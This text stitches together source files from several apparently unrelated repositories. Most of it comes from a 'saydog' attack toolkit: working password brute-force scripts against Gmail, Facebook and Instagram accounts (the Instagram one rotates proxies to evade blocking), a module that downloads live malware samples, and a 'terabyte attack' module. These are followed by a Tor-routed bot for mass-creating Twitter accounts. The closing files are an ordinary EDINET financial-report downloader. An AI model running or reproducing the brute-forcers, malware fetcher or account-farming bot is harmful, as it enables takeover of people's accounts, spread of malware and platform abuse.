w='\x1b[00m'
r='\x1b[91m'
b='\x1b[36;1m'
y='\x1b[33m'
def infouser():
s =socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8',80))
ipaddress=(s.getsockname()[(0)])
print('Your IP address: '+ipaddress)
s.close()
def exit():
print(r+'[!]'+w+' The user forces it to stop')
print(r+'[!]'+w+' Exiting program')
sys.exit(1)
def corrupt():
print(r+'[?]'+w+' Command not found, please type help')
def help():
print('')
print('TERABYTE ATTACK')
print('----------------')
print('Terabyte attack automatically copies files')
print('and sends files ranging in size from 10MB to 1TB')
print('')
print('command example')
print('------- -------')
print('set name [name files] set name faketool')
print('set output set output /sdcard')
print('run, go, create create')
print('')
def main():
global name
global output
while True:
try:
tyb = input(w+'saydog('+r+'pytoolkit/terabyte'+w+') > ')
if tyb == 'help':
help()
elif tyb == 'clear':
os.system('clear')
elif tyb == 'back':
sys.exit(0)
elif tyb == 'exit':
exit()
elif 'set name' in tyb:
name = tyb.split()[(-1)]
print('name > '+name)
elif 'set output' in tyb:
output = tyb.split()[(-1)]
print('output > '+output)
elif tyb == 'run' or tyb == 'go' or tyb == 'create' or tyb == 'exploit':
print(b+'[-]'+w+' Writting code for terabyte attack')
time.sleep(2)
print(b+'[-]'+w+' set looping in 100000')
time.sleep(3)
os.system('cat tera > '+output+'/terabyte.py')
print(b+'[+]'+w+' success, file saved as '+output)
else:
corrupt()
except KeyboardInterrupt:
exit()
main()
```
#### File: exploit/socialbrute/gmailbrute.py
```python
import smtplib
import os,sys
import time
u='\033[4m'
w='\x1b[00m'
r='\x1b[91m'
c='\x1b[36;1m'
y ='\x1b[33m'
def exit():
print(r+'[!]'+w+' The user forces it to stop')
print(r+'[!]'+w+' Exiting program')
sys.exit(1)
def corrupt():
print(r+'[?]'+w+' Command not found, please type help')
def help():
print('')
print('BRUTEFORCE GMAIL')
print('---------------')
print('Bruteforce attack gmail')
print('command example')
print('------- -------')
print('set username [target] set username <EMAIL>')
print('set wordlist [path/name] set wordlist pass.txt')
print('show, show value show value')
print('run, go, exploit exploit')
print('')
user = ''
file = ''
def server():
smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()
def main():
global user
global file
while True:
usr = input(w+'saydog('+r+'socialbrute/gmail'+w+') > ')
if usr == 'help':
help()
elif usr == 'clear':
os.system('clear')
elif usr == 'back':
sys.exit(0)
elif usr == 'exit':
exit()
elif 'set username' in usr:
user = usr.split()[(-1)]
print('username > '+user)
elif 'set wordlist' in usr:
file = usr.split()[(-1)]
print('wordlist > '+file)
elif usr == 'show' or usr == 'show value':
print('')
print('-------------------------')
print('username : '+user)
print('wordlist : '+file)
print('-------------------------')
print('')
elif usr == 'run' or usr == 'go' or usr =='exploit':
print(y+'[-]'+w+' Starting bruteforce attack to '+user)
print(y+'[-]'+w+' List of words found on '+file)
print('')
time.sleep(3)
print(y+'[-]'+w+' Preparing for attack ...')
time.sleep(2)
print(c+'[!]'+w+' Bruteforce is running')
print('')
file = open(file,'r')
for password in file:
try:
smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()
smtpserver.login(user, password)
print(c+'[+]'+w+' Successful exploitation')
print(c+'[+]'+w+' Password found: %s' % password)
time.sleep(1)
except smtplib.SMTPAuthenticationError:
print(y+'[-]'+w+' Password incorrect: %s' % password.strip())
except FileNotFoundError:
print(r+'[!] Error:'+w+' [username] or [wordlist] not found')
except KeyboardInterrupt:
exit()
else:
corrupt()
main()
```
#### File: exploit/socialbrute/instabrute.py
```python
import os,sys
from time import *
from __main__ import *
w='\x1b[00m'
u='\033[4m'
b='\x1b[36;1m'
r='\x1b[91m'
user = ' '
worldlist = ' '
def sprint(s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(0.1 / 100)
def corrupt():
print(r+'[?]'+w+' Command not found, please type help')
def exit():
print(r+'[!]'+w+' The user forces it to stop')
print(r+'[!]'+w+' Exiting program')
sys.exit(2)
def help():
print('')
print('BRUTEFORCE INSTAGRAM')
print('--------------------')
print('instagram bruteforce attack')
print('using wordlist with proxy and CSRF token')
print('')
print('command example')
print('------- -------')
print('set username [target] set username iqbalmh18')
print('set wordlist [path/name] set wordlist pass.txt')
print('show, show value show value')
print('run, go, exploit exploit')
print('')
print('other command description')
print('------------- -----------')
print('back back to main menu')
print('clear clear screen')
print('exit exit tool')
print('')
def imain():
global user
global wordlist
while True:
try:
ig = input(w+'saydog('+r+'socialbrute/instagram'+w+') > ')
if ig == 'help' or ig == '?':
help()
imain()
elif 'set username' in ig:
user = ig.split()[(-1)]
print('username > '+user)
elif 'set wordlist' in ig:
wordlist = ig.split()[(-1)]
print('wordlist > '+wordlist)
elif ig == 'show' or ig == 'show value':
print('')
print('-----------------------')
print('username : '+user)
print('wordlist : '+wordlist)
print('-----------------------')
print('')
elif ig == 'exploit' or ig == 'run' or ig == 'go':
os.system('python __mainig__.py -u '+user+' -w '+wordlist+' -p proxys.txt -d -v')
elif ig == 'clear':
os.system('clear')
elif ig == 'exit':
exit()
elif ig == 'back':
sys.exit(0)
except NameError:
print(r+'[!] Error:'+w+' [username] or [wordlist] not found')
except KeyboardInterrupt:
exit()
if __name__ == '__main__':
imain()
```
#### File: exploit/socialbrute/__mainfb__.py
```python
import time
import getopt
import sys
import httplib
import urllib
import re
u='\033[4m'
w='\x1b[00m'
r='\x1b[91m'
b='\x1b[36;1m'
y='\x1b[33m'
HEADERS = {
"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1",
# "Accept-Encoding": "gzip, deflate",
"Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Cookie": "locale=es_LA"
}
DATA = {
"return_session": 0,
"legacy_return": 1,
"display": "",
"session_key_only": 0,
"trynum": 1,
"timezone": 360,
"persistent": 1,
"default_persistent": 1,
"login": "Entrar"
}
def main(argv):
print "\x1b[36;1m[\x1b[00m-\x1b[36;1m]\x1b[00m Preparing for attack using wordlist"
print "\x1b[36;1m[\x1b[00m-\x1b[36;1m]\x1b[00m Bruteforce is running"
error, options = parse_args(argv)
if error or "help" in options:
usage()
return
DATA["email"] = options["username"]
host = "www.facebook.com"
port = 80
resource = "/login.php"
if "proxy" in options:
host, port = options["proxy"].split(":")
resource = "http://www.facebook.com/login.php"
running = True
waiting = False
found = False
count = 1
while running:
if not waiting:
count = 1
passwd = unicode(options["passdb"].readline().strip(), options["encoding"])
if not passwd:
break
try:
waiting = False
print "\x1b[33m[\x1b[00m-\x1b[33m]\x1b[00m Trying pass in wordlist {0}".format(passwd.encode(options["encoding"]))
conn = httplib.HTTPConnection(host, port)
# needs to be encoded in utf-8 for urlencode
DATA["pass"] = passwd.encode("utf-8")
params = urllib.urlencode(DATA)
conn.request("POST", resource, params, HEADERS)
response = conn.getresponse()
response = response.read()
conn.close()
if len(response.strip()) == 0:
found = True
print "========================================"
print "\x1b[36;1m[\x1b[00m-\x1b[36;1m]\x1b[00mPassword Founded: {0}".format(passwd.encode(options["encoding"]))
print "========================================"
break
elif response.find("menudo") != -1:
waiting = True
print "Waiting..."
time.sleep(60 * count)
count += 1
except Exception, err:
print "An error ocurred: ", str(err)
if not found:
print "\x1b[91m[\x1b[00m-\x1b[91m]\x1b[00m Password not founded, try again later!"
def parse_args(argv):
options = { "encoding": "utf-8" }
error = False
try:
opts, args = getopt.getopt(argv, "u:p:e:P:h", ["username=", "passdb=", "encoding=", "proxy=", "help"])
for opt, arg in opts:
if opt in ("-u", "--username"):
options["username"] = arg
elif opt in ("-p", "--passdb"):
options["passdb"] = open(arg)
elif opt in ("-e", "--encoding"):
options["encoding"] = arg
elif opt in ("-P", "--proxy"):
if not re.search("^(\w+|\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}):\d+$", arg):
raise Exception("Invalid format for proxy, should be host:port")
options["proxy"] = arg
elif opt in ("-h", "--help"):
options["help"] = True
else:
error = True
except Exception, err:
error = True
print str(err)
if "username" not in options or "passdb" not in options:
error = True
return error, options
def usage():
print """fb.py -u (Username) -p (password list name) [-e encoding] [-P proxy:port]""".format(__version__)
if __name__ == "__main__":
main(sys.argv[1:])
```
#### File: exploit/socialbrute/__mainig__.py
```python
from __future__ import print_function
from instabrute import *
import argparse
import logging
import random
import socket
import sys
import threading
r="\x1b[91m"
w="\x1b[00m"
c ="\x1b[36;1m"
y="\x1b[33m"
try:
import urllib.request as rq
from urllib.error import HTTPError
import urllib.parse as http_parser
except ImportError:
import urllib2 as rq
from urllib2 import HTTPError
import urllib as http_parser
try:
import Queue
except ImportError:
import queue as Queue
def check_proxy(q):
"""
check proxy for and append to working proxies
:param q:
"""
if not q.empty():
proxy = q.get(False)
proxy = proxy.replace("\r", "").replace("\n", "")
try:
opener = rq.build_opener(
rq.ProxyHandler({'https': 'https://' + proxy}),
rq.HTTPHandler(),
rq.HTTPSHandler()
)
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
rq.install_opener(opener)
req = rq.Request('https://api.ipify.org/')
if rq.urlopen(req).read().decode() == proxy.partition(':')[0]:
proxys_working_list.update({proxy: proxy})
if _verbose:
print(c+"[+]"+w+" Successfully connected with "+proxy)
else:
if _verbose:
print(r+"[!]"+w+" Failed to connect with "+proxy)
except Exception as err:
if _verbose:
print(r+"[!]"+w+" Failed to connect with "+proxy)
if _debug:
logger.error(err)
pass
def get_csrf():
"""
get CSRF token from login page to use in POST requests
"""
global csrf_token
print(y+"[+]"+w+" Trying to get CSRF token ...")
try:
opener = rq.build_opener(rq.HTTPHandler(), rq.HTTPSHandler())
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
rq.install_opener(opener)
request = rq.Request('https://www.instagram.com/')
try:
# python 2
headers = rq.urlopen(request).info().headers
except Exception:
# python 3
headers = rq.urlopen(request).info().get_all('Set-Cookie')
for header in headers:
if header.find('csrftoken') != -1:
csrf_token = header.partition(';')[0].partition('=')[2]
print(c+"[+]"+w+" CSRF Token : "+csrf_token)
except Exception as err:
print(r+"[!]"+w+" Oops, cant get CSRF token, please try again")
if _debug:
logger.error(err)
print("[!]"" Exiting ...")
exit(3)
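# Note (added): the CSRF token is parsed from a Set-Cookie header of the form
# "csrftoken=<value>; ..." and is later sent back in both the X-CSRFToken header
# and the Cookie header of the login POST built in brute().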
def brute(q):
"""
main worker function
:param q: queue of candidate passwords
:return:
"""
if not q.empty():
try:
proxy = None
if len(proxys_working_list) != 0:
proxy = random.choice(list(proxys_working_list.keys()))
word = q.get()
word = word.replace("\r", "").replace("\n", "")
post_data = {
'username': USER,
'password': <PASSWORD>,
}
header = {
"User-Agent": random.choice(user_agents),
'X-Instagram-AJAX': '1',
"X-CSRFToken": csrf_token,
"X-Requested-With": "XMLHttpRequest",
"Referer": "https://www.instagram.com/",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
'Cookie': 'csrftoken=' + csrf_token
}
if proxy:
if _verbose:
print(y+"[-]"+w+" Password incorrect %s %s " % (word, proxy,))
opener = rq.build_opener(
rq.ProxyHandler({'https': 'https://' + proxy}),
rq.HTTPHandler(),
rq.HTTPSHandler()
)
else:
if _verbose:
print(y+"[-]"+w+" Password incorrect %s" % (word,))
opener = rq.build_opener(
rq.HTTPHandler(),
rq.HTTPSHandler()
)
rq.install_opener(opener)
req = rq.Request(URL, data=http_parser.urlencode(post_data).encode('ascii'), headers=header)
sock = rq.urlopen(req)
if sock.read().decode().find('"authenticated": true') != -1:
print(c+"\n[+]"+w+" Successful exploitation")
print(w+" Username: "+y, USER)
print(w+" Password: "+y, word)
found_flag = True
q.queue.clear()
q.task_done()
except HTTPError as e:
if e.getcode() == 400 or e.getcode() == 403:
if e.read().decode("utf8", 'ignore').find('"checkpoint_required"') != -1:
print(c+"\n[!]"+w+" Successfully login, but checkpoint")
print("")
print(r+"[!]"+w+" Username: "+y, USER)
print(r+"[!]"+w+" Password: "+y, word)
print("")
found_flag = True
q.queue.clear()
q.task_done()
return
elif proxy:
print(r+"[!] Error:"+w+" Proxy IP %s now is blocked by instagram" % (proxy,))
if proxy in proxys_working_list:
proxys_working_list.pop(proxy)
print(c+"[+]"+w+" Online Proxy: ", str(len(proxys_working_list)))
else:
print(r+"[!] Error:"+w+" Your IP now is blocked by instagram")
print(r+"[!]"+w+" Please use Proxy or VPN App")
else:
print(r+"[!]"+w+" Error:", e.getcode())
q.task_done()
return
except Exception as err:
if _debug:
print(r+"[!]"+w+" Problems in the proxy connection")
logger.error(err)
else:
print(r+"[!]"+w+" Problems in the proxy connection")
pass
return
def starter():
"""
threading workers initialize
"""
global found_flag
queue = Queue.Queue()
threads = []
max_thread = THREAD
found_flag = False
queuelock = threading.Lock()
print(y+"\n[-]"+w+" Preparing for attack ...")
print(c+"[!]"+w+" Bruteforce is running\n")
try:
for word in words:
queue.put(word)
while not queue.empty():
queuelock.acquire()
for workers in range(max_thread):
t = threading.Thread(target=brute, args=(queue,))
t.setDaemon(True)
t.start()
threads.append(t)
for t in threads:
t.join()
queuelock.release()
if found_flag:
break
print("")
print(y+"[!]"+w+" Bruteforce attack completed")
except Exception as err:
print(err)
def check_avalaible_proxys(proxys):
"""
check available proxies from the proxy list file
"""
socket.setdefaulttimeout(30)
global proxys_working_list
print(y+"[-]"+w+" Try connecting with a proxy list ...\n")
proxys_working_list = {}
max_thread = THREAD
queue = Queue.Queue()
queuelock = threading.Lock()
threads = []
for proxy in proxys:
queue.put(proxy)
while not queue.empty():
queuelock.acquire()
for workers in range(max_thread):
t = threading.Thread(target=check_proxy, args=(queue,))
t.setDaemon(True)
t.start()
threads.append(t)
for t in threads:
t.join()
queuelock.release()
print(c+"[+]"+w+" Successfully connected with "+ str(len(proxys_working_list))+" proxy")
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Instagram BruteForcer",
epilog="./instabrute -u user_test -w words.txt -p proxys.txt -t 4 -d -v"
)
# required argument
parser.add_argument('-u', '--username', action="store", required=True,
help='Target Username')
parser.add_argument('-w', '--word', action="store", required=True,
help='Words list path')
parser.add_argument('-p', '--proxy', action="store", required=True,
help='Proxy list path')
# optional arguments
parser.add_argument('-t', '--thread', help='Thread', type=int, default=4)
parser.add_argument('-v', '--verbose', action='store_const', help='Thread', const=True, default=False)
parser.add_argument('-d', '--debug', action='store_const', const=True, help='Debug mode', default=False)
args = parser.parse_args()
URL = "https://www.instagram.com/accounts/login/ajax/"
USER = args.username
THREAD = args.thread
_verbose = args.verbose
_debug = args.debug
user_agents = ["Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko)",
"Mozilla/5.0 (Linux; U; Android 2.3.5; en-us; HTC Vision Build/GRI40) AppleWebKit/533.1",
"Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko)",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201",
"Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0",
"Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))"]
try:
words = open(args.word).readlines()
except IOError:
print("[-]"" Error: Check your word list file path\n")
sys.exit(1)
try:
proxys = open(args.proxy).readlines()
except IOError:
print("[-]"" Error: Check your proxy list file path\n")
sys.exit(1)
# enable debugging if its set
if _debug:
# Logging stuff
logging.basicConfig(level=logging.DEBUG, filename="log",
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
print(y+"[-]"+w+" Starting bruteforce attack to", USER)
print(y+"[-]"+w+" List of words found on file", str(len(words)))
print(y+"[-]"+w+" List of proxy found on proxys.txt", str(len(proxys)))
check_avalaible_proxys(proxys)
get_csrf()
starter()
```
#### File: module/malware/41.py
```python
import os,sys
import time
u='\033[4m'
w='\x1b[00m'
r='\x1b[91m'
b='\x1b[36;1m'
y='\x1b[33m'
def exit():
print(r+'[!]'+w+' The user forces it to stop')
print(r+'[!]'+w+' Exiting program')
sys.exit(1)
def corrupt():
print(r+'[?]'+w+' Command not found, please type help')
########### SHA ############
def thezoo():
while True:
try:
global name
global output
names = 'Junkie'
mg2 = input(w+'saydog('+r+'malware/'+names+w+') > ')
if mg2 == 'help':
print('')
print('Malware name: '+names)
print('-------')
print('command example')
print('------- -------')
print('set name [new name] set name saydog')
print('set output [path] set output /sdcard')
print('show show')
print('run, go, create create')
print('')
elif mg2 == 'exit':
exit()
elif mg2 == 'back':
malware()
elif mg2 == 'clear':
os.system('clear')
elif 'set name' in mg2:
name = mg2.split()[(-1)]
print('name > '+name)
elif 'set output' in mg2:
output = mg2.split()[(-1)]
print('output > '+output)
elif mg2 == 'show':
print('')
print('-------------------')
print('name : '+name)
print('output : '+output)
print('-------------------')
print('')
elif mg2 == 'run' or mg2 == 'go' or mg2 == 'create':
time.sleep(1)
print(y+'[-]'+w+' Generate malware '+names)
time.sleep(2)
print(y+'[-]'+w+' please wait for a minute ...')
os.system('wget https://raw.githubusercontent.com/ytisf/theZoo/master/malwares/Binaries/'+names+'/'+names+'.md5 -O '+output+'/'+name+'.md5')
os.system('wget https://raw.githubusercontent.com/ytisf/theZoo/master/malwares/Binaries/'+names+'/'+names+'.pass -O '+output+'/'+name+'.pass')
os.system('wget https://raw.githubusercontent.com/ytisf/theZoo/master/malwares/Binaries/'+names+'/'+names+'.sha -O '+output+'/'+name+'.sha')
os.system('wget https://raw.githubusercontent.com/ytisf/theZoo/master/malwares/Binaries/'+names+'/'+names+'.zip -O '+output+'/'+name+'.zip')
print(w+'\033[41m success \033[00m file saved as '+output)
else:
corrupt()
except NameError:
print(r+'[!] Error: '+w+'[name] or [output] not found')
except KeyboardInterrupt:
exit()
thezoo()
``` |
{
"source": "5l1v3r1/twitter-accounts-creator-bot",
"score": 2
} |
#### File: 5l1v3r1/twitter-accounts-creator-bot/accounts.py
```python
import sys
import time
import getopt
import simplejson
from selenium import webdriver
from SeleniumHelper import SeleniumHelper
class TwitterCreator(SeleniumHelper):
MOBILE_URL_CREATE = 'https://mobile.twitter.com/signup?type=email'
MOBILE_FIELD_SIGN_UP_NAME = '#oauth_signup_client_fullname'
MOBILE_FIELD_SIGN_UP_EMAIL = '#oauth_signup_client_phone_number'
MOBILE_FIELD_SIGN_UP_PASSWORD = <PASSWORD>'
MOBILE_FIELD_SIGN_UP_USERNAME = '#custom_name'
MOBILE_BUTTON_SKIP_PHONE = '.signup-skip input'
MOBILE_BUTTON_INTERESTS = 'input[data-testid="Button"]'
DESKTOP_URL_CREATE = 'https://twitter.com/signup'
DESKTOP_URL_SKIP = 'https://twitter.com/account/add_username'
DESKTOP_URL_MAIN = 'https://twitter.com'
DESKTOP_FIELD_SIGN_UP_NAME = '#full-name'
DESKTOP_FIELD_SIGN_UP_EMAIL = '#email'
DESKTOP_FIELD_SIGN_UP_PASSWORD = <PASSWORD>'
DESKTOP_FIELD_SIGN_UP_USERNAME = '#username'
DESKTOP_FIELD_SIGN_UP_PHONE = '#phone_number'
DESKTOP_FIELD_SIGN_UP_CODE = '#code'
DESKTOP_FIELD_SIGN_UP_SUGGESTION = '.suggestions > ul:nth-child(2) > li:nth-child(1) > button:nth-child(1)'
DESKTOP_FIELD_LOGOUT = '#signout-form'
DESKTOP_BUTTON_SKIP_PHONE = '.signup-skip input'
DESKTOP_BUTTON_CALL_ME = 'input[name="call_me"]'
DESKTOP_BUTTON_INTERESTS = 'input[data-testid="Button"]'
DESKTOP_PAGE_CONTAINER = '#page-container'
DESKTOP_PAGE_PHONE = '.PageContainer'
DESKTOP_PAGE_INI = '#doc'
def mobileCreateUser(self, row):
self.loadPage(self.DESKTOP_URL_CREATE)
self.waitAndWrite(self.DESKTOP_FIELD_SIGN_UP_NAME, row['name'])
self.submitForm(self.selectAndWrite(self.DESKTOP_FIELD_SIGN_UP_EMAIL, row['email']))
self.submitForm(self.waitAndWrite(self.DESKTOP_FIELD_SIGN_UP_PASSWORD, row['password']))
self.clickSelector(self.DESKTOP_BUTTON_SKIP_PHONE)
self.submitForm(self.waitAndWrite(self.DESKTOP_FIELD_SIGN_UP_USERNAME, row['username']))
self.waitAndClick(self.DESKTOP_BUTTON_INTERESTS)
#main_content > div.footer > form > input
time.sleep(9999)
# self.submitForm()
def desktopCreateUser(self, row):
self.loadPage(self.DESKTOP_URL_CREATE)
self.waitAndWrite(self.DESKTOP_FIELD_SIGN_UP_NAME, row['name'])
self.selectAndWrite(self.DESKTOP_FIELD_SIGN_UP_EMAIL, row['email'])
self.submitForm(self.selectAndWrite(self.DESKTOP_FIELD_SIGN_UP_PASSWORD, row['password']))
self.waitShowElement(self.DESKTOP_PAGE_CONTAINER)
self.loadPage(self.DESKTOP_URL_SKIP)
self.submitForm(self.waitAndWrite(self.DESKTOP_FIELD_SIGN_UP_USERNAME, row['username']))
self.waitShowElement(self.DESKTOP_PAGE_CONTAINER)
self.loadPage(self.DESKTOP_URL_MAIN)
time.sleep(9999)
def desktopCreateUserPhone(self, row):
self.loadPage(self.DESKTOP_URL_CREATE)
self.waitAndWrite(self.DESKTOP_FIELD_SIGN_UP_NAME, row['name'])
self.selectAndWrite(self.DESKTOP_FIELD_SIGN_UP_EMAIL, row['email'])
self.submitForm(self.selectAndWrite(self.DESKTOP_FIELD_SIGN_UP_PASSWORD, row['password']))
self.submitForm(self.waitAndWrite(self.DESKTOP_FIELD_SIGN_UP_PHONE, row['phone']))
row['code'] = raw_input('Code: ')
self.submitForm(self.waitAndWrite(self.DESKTOP_FIELD_SIGN_UP_CODE, row['code']))
self.waitAndClick(self.DESKTOP_FIELD_SIGN_UP_SUGGESTION)
self.submitFormSelector(self.DESKTOP_FIELD_SIGN_UP_USERNAME)
self.waitShowElement(self.DESKTOP_PAGE_CONTAINER)
self.loadPage(self.DESKTOP_URL_MAIN)
self.submitForm(self.waitShowElement(self.DESKTOP_FIELD_LOGOUT))
self.waitShowElement(self.DESKTOP_PAGE_INI)
def start(self, callbacks, inputFile, fromRow, toRow, driverType):
try:
rows = simplejson.loads(open(inputFile).read())
numElements = len(rows)
except:
numElements = 0
if numElements > 0:
if toRow == -1:
toRow = numElements
else:
if toRow > numElements:
toRow = numElements
fromRow -= 1
if fromRow < numElements:
self.driver = self.getWebdriver(driverType)
for numRow in range(fromRow, toRow):
row = rows[numRow]
print('Processing row: ' + str(numRow))
for callback in callbacks:
callback(row)
print('Processed.')
self.close()
else:
print('Index out of bounds')
else:
print('Data could not be extracted')
def getWebdriver(self, driverType):
if driverType == 'proxy':
profile = webdriver.FirefoxProfile()
profile.set_preference( "network.proxy.type", 1 )
profile.set_preference( "network.proxy.socks", "127.0.0.1" )
profile.set_preference( "network.proxy.socks_port", 9150 )
profile.set_preference( "network.proxy.socks_remote_dns", True )
profile.set_preference( "places.history.enabled", False )
profile.set_preference( "privacy.clearOnShutdown.offlineApps", True )
profile.set_preference( "privacy.clearOnShutdown.passwords", True )
profile.set_preference( "privacy.clearOnShutdown.siteSettings", True )
profile.set_preference( "privacy.sanitize.sanitizeOnShutdown", True )
profile.set_preference( "signon.rememberSignons", False )
profile.set_preference( "network.cookie.lifetimePolicy", 2 )
profile.set_preference( "network.dns.disablePrefetch", True )
profile.set_preference( "network.http.sendRefererHeader", 0 )
profile.set_preference( "javascript.enabled", False )
profile.set_preference( "permissions.default.image", 2 )
return webdriver.Firefox(profile)
elif driverType == 'headless':
return webdriver.PhantomJS()
else:
return webdriver.Firefox()
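# Note (added): the "proxy" profile routes traffic through a local SOCKS proxy at
# 127.0.0.1:9150 (the Tor Browser default) and disables images, JavaScript, referer
# headers and history to reduce fingerprinting; "headless" uses PhantomJS instead.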
def main(argv):
fromRow = 1
toRow = -1
inputFile = None
driverType = 'proxy'
opts, args = getopt.getopt(argv, "f:t:i:d:")
if opts:
for o, a in opts:
if o in ("-f"):
fromRow = int(a)
elif o in ("-t"):
toRow = int(a)
elif o in ("-i"):
inputFile = a
elif o in ("-d"):
driverType = a
while not inputFile:
inputFile = raw_input('Input file path: ')
creator = TwitterCreator()
print('Process started')
creator.start(callbacks=[creator.desktopCreateUserPhone], inputFile=inputFile, fromRow=fromRow, toRow=toRow, driverType=driverType)
print('Process ended')
if __name__ == "__main__":
main(sys.argv[1:])
``` |
{
"source": "5laps2go/xbrl-reader",
"score": 3
} |
#### File: xbrl-reader/python/download.py
```python
import datetime
import sys
import os
import json
import urllib.request
import codecs
import zipfile
import time
from xbrl_reader import read_company_dic
root_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__))).replace('\\', '/')
download_path = root_dir + '/zip/download'
data_path = root_dir + '/python/data'
for path in [data_path, download_path]:
if not os.path.exists(path):
# Create the folder if it does not exist.
os.makedirs(path)
# Load the company information dictionary.
company_dic = read_company_dic()
def receive_edinet_doc_list(day_path: str, yyyymmdd: str):
"""EDINETから書類一覧APIを使って書類一覧が入ったJSONオブジェクト取得して返す。
Args:
day_path (str): JSONオブジェクトを保存するフォルダーのパス
yyyymmdd (str): 日付の文字列
Returns:
書類一覧が入ったJSONオブジェクト
"""
# Send the request to the document-list API.
url = 'https://disclosure.edinet-fsa.go.jp/api/v1/documents.json?date=%s&type=2' % yyyymmdd
req = urllib.request.Request(url)
with urllib.request.urlopen(req) as res:
try:
body = json.load(res)
except json.decoder.JSONDecodeError:
print("書類一覧のデータが不正です。\nEDINETがメンテナンス中の可能性があります。")
sys.exit()
if body['metadata']['status'] == "404":
# No documents exist for this date.
print("報告書の取得を終了しました。")
return None
assert body['metadata']['message'] == "OK"
# Write the JSON to a file.
json_path = "%s/docs.json" % day_path
with codecs.open(json_path, 'w', 'utf-8') as json_f:
json.dump(body, json_f, ensure_ascii=False)
return body
def check_zip_file(zip_path: str):
"""ZIPファイルが壊れていないか調べる。
Args:
zip_path(str): ZIPファイルのパス
Returns:
bool: 壊れていなければTrue
"""
try:
# Open the ZIP file and check that it can be read.
with zipfile.ZipFile(zip_path) as zf:
file_list = list(zf.namelist())
return True
except zipfile.BadZipFile:
return False
def receive_edinet_doc(doc, dst_path):
"""EDINETから書類取得APIで決算情報のZIPファイルをダウンロードする。
Args:
doc : 書類オブジェクト
dst_path(str): ダウンロード先のパス
"""
edinetCode = doc['edinetCode']
company = company_dic[edinetCode]
# Print the submission time, filer name, document description and industry.
print("%s | %s | %s | %s" % (doc['submitDateTime'], doc['filerName'], doc['docDescription'], company['category_name_jp']))
# Send the request to the document-fetch API.
url = "https://disclosure.edinet-fsa.go.jp/api/v1/documents/%s?type=1" % doc['docID']
with urllib.request.urlopen(url) as web_file:
data = web_file.read()
# Write the financial-report ZIP file.
with open(dst_path, mode='wb') as local_file:
local_file.write(data)
if not check_zip_file(dst_path):
# The ZIP file is corrupted.
print("!!!!!!!!!! ERROR !!!!!!!!!!\n" * 1)
print("msg:[%s] status:[%s] reason:[%s]" % (str(web_file.msg), str(web_file.status), str(web_file.reason) ))
print("!!!!!!!!!! ERROR [%s] !!!!!!!!!!\n" % dst_path)
print(json.dumps(doc, indent=2, ensure_ascii=False))
print("!!!!!!!!!! ERROR !!!!!!!!!!\n" * 1)
os.remove(dst_path)
time.sleep(2)
time.sleep(1)
def select_doc(day_path, body):
"""書類一覧の中で対象となる書類を返す。
対象となる書類とは以下の条件を満たす書類。
* 有価証券報告書/四半期報告書/半期報告書またはそれの訂正書類。
* 財務局職員が修正した書類ではない。
* 会社情報の一覧に含まれる上場企業の書類
Returns:
対象書類
"""
for doc in body['results']:
docTypeCode = doc['docTypeCode']
if docTypeCode in [ '120', '130', '140', '150', '160', '170' ] and doc['docInfoEditStatus'] == "0":
# Annual/quarterly/semiannual report (or an amendment) that was not corrected by FSA staff.
edinetCode = doc['edinetCode']
if edinetCode in company_dic:
# The filer is included in the company information list.
company = company_dic[edinetCode]
if company['listing'] == '上場':
# The filer is a listed company.
yield doc
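# Note (added, assumption based on the docstring above): docTypeCode 120/130 are the
# annual securities report and its amendment, 140/150 the quarterly report and its
# amendment, 160/170 the semiannual report and its amendment; docInfoEditStatus == "0"
# means the filing was not corrected by FSA staff.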
def get_xbrl_docs():
"""ダウンロードのメイン処理
現在の日付から1日ずつ過去にさかのぼって書類をダウンロードする。
"""
# Today's date.
dt1 = datetime.datetime.today()
while True:
# Step back one day.
dt1 = dt1 + datetime.timedelta(days=-1)
yyyymmdd = "%d-%02d-%02d" % (dt1.year, dt1.month, dt1.day)
print(yyyymmdd)
day_path = "%s/%d/%02d/%02d" % (download_path, dt1.year, dt1.month, dt1.day)
if not os.path.exists(day_path):
# Create the folder if it does not exist.
os.makedirs(day_path)
os.chdir(day_path)
json_path = "%s/docs.json" % day_path
if os.path.exists(json_path):
# The document-list JSON file already exists.
with codecs.open(json_path, 'r', 'utf-8') as f:
body = json.load(f)
else:
# The document-list JSON file does not exist yet.
body = receive_edinet_doc_list(day_path, yyyymmdd)
if body is None:
break
time.sleep(1)
for doc in select_doc(day_path, body):
dst_path = "%s/%s-%s-%d.zip" % (day_path, doc['edinetCode'], doc['docTypeCode'], doc['seqNumber'])
if os.path.exists(dst_path):
# The financial-report ZIP file already exists.
if check_zip_file(dst_path):
# The ZIP file is intact.
continue
# Delete the corrupted ZIP file.
os.remove(dst_path)
# Download the financial-report ZIP file from EDINET.
receive_edinet_doc(doc, dst_path)
if __name__ == '__main__':
get_xbrl_docs()
```
#### File: xbrl-reader/python/extract.py
```python
import os
import zipfile
from pathlib import Path
import re
import codecs
import multiprocessing
from multiprocessing import Process
